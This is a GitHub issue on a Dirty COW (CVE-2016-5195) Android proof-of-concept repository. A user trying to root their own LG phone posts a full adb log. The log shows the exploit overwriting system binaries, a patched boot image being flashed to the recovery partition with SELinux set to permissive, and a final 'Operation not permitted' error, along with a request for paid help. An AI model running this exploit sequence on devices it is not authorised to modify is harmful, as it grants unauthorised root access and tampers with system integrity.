search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

LGH91810j - WETA Rom, lost root + twrp. runas operation not permitted #52

Open darkseid4nk opened 7 years ago

darkseid4nk commented 7 years ago

Stuck in an unrooted non stock rom. OEM unlocked. USB Debugging ON. getenforce permissive. Full log. Everything works up till run-as. Offering $50 to whoever can help fix this. Full log of adb command:

`C:\Users\darkseid\Desktop\LG_stuff>adb push dirtycow /data/local/tmp dirtycow: 1 file pushed. 0.2 MB/s (9984 bytes in 0.042s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-applypatch /data/local/tmp recowvery-applypatch: 1 file pushed. 1.7 MB/s (18472 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-app_process64 /data/local/tmp recowvery-app_process64: 1 file pushed. 1.0 MB/s (10200 bytes in 0.009s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-run-as /data/local/tmp recowvery-run-as: 1 file pushed. 0.9 MB/s (10192 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb shell elsa:/ $ cd /data/local/tmp elsa:/data/local/tmp $ ls dirtycow recowvery-app_process64 recowvery-applypatch recowvery-run-as elsa:/data/local/tmp $ chmod 0777 * elsa:/data/local/tmp $ ./dirtycow /system/bin/applypatch recowvery-applypatch warning: new file size (18472) and file old size (165144) differ

size 165144

[] mmap 0x79eac35000 [] exploit (patch) [] currently 0x79eac35000=10102464c457f [] madvise = 0x79eac35000 165144 [] madvise = 0 1048576 [] /proc/self/mem 1367343104 1048576 [*] exploited 0x79eac35000=10102464c457f elsa:/data/local/tmp $ ./dirtycow /system/bin/app_process64 recowvery-app_process64 warning: new file size (10200) and file old size (18600) differ

size 18600

[] mmap 0x7280bda000 [] exploit (patch) [] currently 0x7280bda000=10102464c457f [] madvise = 0x7280bda000 18600 [] madvise = 0 1048576 [] /proc/self/mem -1971322880 1048576 [*] exploited 0x7280bda000=10102464c457f elsa:/data/local/tmp $ exit

C:\Users\darkseid\Desktop\LG_stuff>adb logcat -s recowvery --------- beginning of system --------- beginning of main --------- beginning of crash 01-21 19:34:18.696 7457 7457 I recowvery: Welcome to recowvery! (app_process64) 01-21 19:34:18.696 7457 7457 I recowvery: ------------ 01-21 19:34:18.697 7457 7457 I recowvery: Current selinux context: u:r:zygote:s0 01-21 19:34:18.697 7457 7457 I recowvery: Set context to 'u:r:system_server:s0' 01-21 19:34:18.698 7457 7457 I recowvery: Current security context: u:r:system_server:s0 01-21 19:34:18.698 7457 7457 I recowvery: Setting property 'ctl.start' to 'flash_recovery' 01-21 19:34:18.708 7457 7457 I recowvery: ------------ 01-21 19:34:18.708 7457 7457 I recowvery: Recovery flash script should have started! 01-21 19:34:18.708 7457 7457 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery 01-21 19:34:18.708 7457 7457 I recowvery: Waiting 120 seconds... 01-21 19:34:18.756 7461 7461 I recowvery: Welcome to recowvery! (applypatch) 01-21 19:34:18.757 7461 7461 I recowvery: ------------ 01-21 19:34:18.757 7461 7461 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'... 01-21 19:34:18.871 7461 7461 I recowvery: Loaded boot image! 01-21 19:34:18.871 7461 7461 I recowvery: ------------ 01-21 19:34:18.871 7461 7461 I recowvery: Saving old ramdisk to file 01-21 19:34:18.892 7461 7461 I recowvery: Writing to file '/cache/ramdisk.gz'... 01-21 19:34:18.930 7461 7461 I recowvery: Wrote OK: 7100944 bytes 01-21 19:34:18.930 7461 7461 I recowvery: Decompressing ramdisk (gzip -d) 01-21 19:34:19.357 7461 7461 I recowvery: Checking '/cache/ramdisk.cpio' for validity (size >= 4194304 bytes) 01-21 19:34:19.357 7461 7461 I recowvery: '/cache/ramdisk.cpio': 18494316 bytes 01-21 19:34:19.357 7461 7461 I recowvery: File OK 01-21 19:34:19.357 7461 7461 I recowvery: Decompression of ramdisk successful 01-21 19:34:19.357 7461 7461 I recowvery: Deleting '/cache/ramdisk.gz' (no longer needed) 01-21 19:34:19.363 7461 7461 I recowvery: ------------ 01-21 19:34:19.363 7461 7461 I recowvery: Opened cpio archive '/cache/ramdisk.cpio' (18494316 bytes) 01-21 19:34:19.363 7461 7461 I recowvery: Wrote new file (308 bytes) to cpio archive, 01-21 19:34:19.363 7461 7461 I recowvery: Final size: 18494624 bytes 01-21 19:34:19.363 7461 7461 I recowvery: ------------ 01-21 19:34:19.363 7461 7461 I recowvery: Compressing cpio to ramdisk (gzip -9 -c) 01-21 19:34:25.911 7461 7461 I recowvery: Checking '/cache/ramdisk.gz' for validity (size >= 2097152 bytes) 01-21 19:34:25.912 7461 7461 I recowvery: '/cache/ramdisk.gz': 7079535 bytes 01-21 19:34:25.912 7461 7461 I recowvery: File OK 01-21 19:34:25.912 7461 7461 I recowvery: Compression of ramdisk successful 01-21 19:34:25.912 7461 7461 I recowvery: Deleting '/cache/ramdisk.cpio' (no longer needed) 01-21 19:34:25.930 7461 7461 I recowvery: Loading new ramdisk into boot image 01-21 19:34:25.942 7461 7461 I recowvery: ------------ 01-21 19:34:25.942 7461 7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0" 01-21 19:34:25.942 7461 7461 I recowvery: Setting permissive arguments on cmdline 01-21 19:34:25.942 7461 7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0" 01-21 19:34:25.942 7461 7461 I recowvery: ------------ 01-21 19:34:25.942 7461 7461 I recowvery: Updating boot image hash 01-21 19:34:26.363 7461 7461 I recowvery: Writing modified boot image to block device '/dev/block/bootdevice/by-name/recovery'... 01-21 19:34:26.581 7461 7461 I recowvery: Done! 01-21 19:34:26.581 7461 7461 I recowvery: ------------ 01-21 19:34:26.581 7461 7461 I recowvery: Permissive boot has been has been flashed to /dev/block/bootdevice/by-name/recovery successfully! 01-21 19:34:26.581 7461 7461 I recowvery: You may use 'reboot recovery' now to enter a permissive system. 01-21 19:34:26.581 7461 7461 I recowvery: 01-21 19:34:26.581 7461 7461 I recowvery: give jcadduono a hug, will ya? 01-21 19:34:26.581 7461 7461 I recowvery: ^C C:\Users\darkseid\Desktop\LG_stuff>adb shell reboot recovery

C:\Users\darkseid\Desktop\LG_stuff>adb shell elsa:/ $ getenforce Permissive elsa:/ $ cd /data/local/tmp elsa:/data/local/tmp $ ./dirtycow /system/bin/run-as recowvery-run-as warning: new file size (10192) and file old size (14360) differ

size 14360

[] mmap 0x7864c47000 [] exploit (patch) [] currently 0x7864c47000=10102464c457f [] madvise = 0x7864c47000 14360 [] madvise = 0 1048576 [] /proc/self/mem -2122317824 1048576 [*] exploited 0x7864c47000=10102464c457f elsa:/data/local/tmp $ run-as exec ./recowvery-applypatch boot Welcome to recowvery! (run-as)

Current uid: 2000 Setting capabilities Could not set capabilities Error 1: Operation not permitted`